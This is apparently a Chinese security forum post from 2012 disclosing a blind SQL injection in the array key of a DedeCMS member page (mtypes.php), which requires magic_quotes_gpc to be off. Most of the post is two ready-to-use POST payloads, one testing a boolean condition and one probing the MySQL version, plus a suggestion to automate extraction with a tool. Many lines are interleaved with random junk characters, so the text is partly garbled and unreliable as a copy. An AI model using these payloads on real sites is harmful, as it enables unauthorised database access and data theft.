需要magic_quotes_gpc = Off,所以说是鸡肋啊.
* k& h7 }3 M' ~0 p8 l8 W) ~+ R6 w3 x1 V" P5 d+ m5 m. M' o" t" K
4 N% G& _% a3 X
发生在数组key里的注射漏洞,有点意思.% t$ S$ G, c! |% _1 X+ Z5 V
; u" \4 S' Y r/ e! g这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下, F W* R9 W2 H; X( e& t
1 |" W7 b# n- `http://www.xxx.com /dede/member/mtypes.php?dopost=save r* p( A; Q8 ~
, L* G$ {* W& B% ]6 }5 c8 t, P4 X
exploit:
0 p2 K3 ?* x/ Q& B3 x8 c0 zmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r- m$ w# H7 x$ F- R
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r% \6 D$ s# Z: U8 M9 L* K
|
发表于 2012-12-20 08:08:09
收藏
支持
反对